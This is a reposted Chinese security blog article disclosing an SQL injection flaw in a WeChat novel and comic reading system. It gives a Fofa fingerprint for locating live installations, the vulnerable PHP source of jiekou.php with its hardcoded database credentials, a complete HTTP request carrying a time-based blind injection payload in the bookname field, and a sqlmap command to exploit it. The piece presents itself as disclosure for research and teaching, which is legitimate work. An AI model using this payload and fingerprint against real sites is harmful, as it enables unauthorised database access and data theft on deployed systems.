点击上方蓝字关注我们 并设为星标
0x00 前言
源码描述:修复版掌上阅读小说源码_公众号漫画源码可以打包漫画app,掌上阅读小说源码支持公众号、代理分站支付功能完善强大的小说源码,可以对接微信公众号、APP打包。支持对接个人微信收款。
1新增签到、平台分享奖励书币、小说推广链接生成,更好的推广平台增加粘性。
2.新增可自定义中间和底部导航。
3.新增可添加章节广告增加收益.
4.可以管理公众号菜单、消息推送、自定义回复。
5.可以添加加盟商分站,可添加代理、自定义扣量。
Fofa指纹:"/Public/home/mhjs/jquery.js"
框架:ThinkPHP 3.2.3 Debug:True
0x01 漏洞分析&复现
在 jiekou.php 中是处理漫画收录的功能,若配置了正确的数据库链接,则存在SQL注入漏洞,下方直接传入sl和bookname 直接被带入到sql查询中,且无任何过滤.
header("Content-type: text/html; charset=utf-8");$servername = "localhost";$username = "root";$password = "root";$dbname = "www.pnp8.com";$sl=$_POST['sl'];$sl1=$_GET['sl1'];$bookname=$_POST['bookname'];//书名$author=$_POST['author'];//作者$des=$_POST['des'];//简介$tstype=$_POST['tstype'];//漫画首页分类$sstype=$_POST['sstype'];//所属分类$zishu=$_POST['zishu'];//简介$litpic=$_POST['litpic'];//封面图$time=$_POST['time'];//发布时间$sharetitle=$_POST['sharetitle'];//发布时间$mhtitle=$_POST['title'];//漫画标题$jino=$_POST['jino'];//漫画编号$mhbody=$_POST['content'];//漫画内容$jine=$_POST['jine'];//阅读金额$sex=$_POST['sex'];//阅读金额$send=$_POST['send'];//打赏金额$status=$_POST['status'];//小说状态(连载1/完结2)$free_type=$_POST['free_type'];//属性(免费1/收费2)$pay_num=$_POST['pay_num'];//第n话开始需要付费// 漫画阅读数(3万-70万之间)$reads_mh=mt_rand(30000, 700000);// 漫画点赞数(1万-2万之间)$dz_mh=mt_rand(10000, 20000);// 章节点赞数(1万-2万之间)$dzzj_mh=mt_rand(10000, 20000);// 收藏数(5000-9000之间)$sc_mh=mt_rand(5000, 9000);// 打赏数(1000-5000之间)$ds_mh=mt_rand(1000, 5000);// 小说阅读数(1万-10万之间)$reads_book=mt_rand(10000, 100000);// 小说点赞数(3000-1万之间)$dz_book=mt_rand(3000, 10000);// 章节点赞数(3000-1万之间)$dzzj_book=$dz_book;// 收藏数(3000-5000之间)$sc_book=mt_rand(3000, 5000);// 打赏数(1000-3000之间)$ds_book=mt_rand(1000, 3000);// 创建连接$conn = new mysqli($servername, $username, $password, $dbname);mysqli_set_charset($conn, "utf8");// 检测连接if ($conn->connect_error) {die("fail: " . $conn->connect_error);return;}if($sl1==3){for($i=114;$i<417;$i++){ $upsql="UPDATE vv_mh_list SET summary=share_desc where id=$i";$conn->query($upsql);echo ' 更新成功';}return;}//添加漫画if($sl==1){if($bookname!=""){$stype="SELECT * FROM `vv_mh_list` where title='$bookname'"; ///这里存在注入$result=$conn->query($stype);
Payload:
POST /jiekou.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 20Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/jiekou.phpSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1sl=1&bookname=' AND (SELECT 2775 FROM (SELECT(SLEEP(5)))IiIJ)-- XrlG
python sqlmap.py -r a.txt --level=3 --dbms=mysql
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
漫画系统源码关注公众号发送 241004 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):微信公众号小说漫画系统存在前台SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论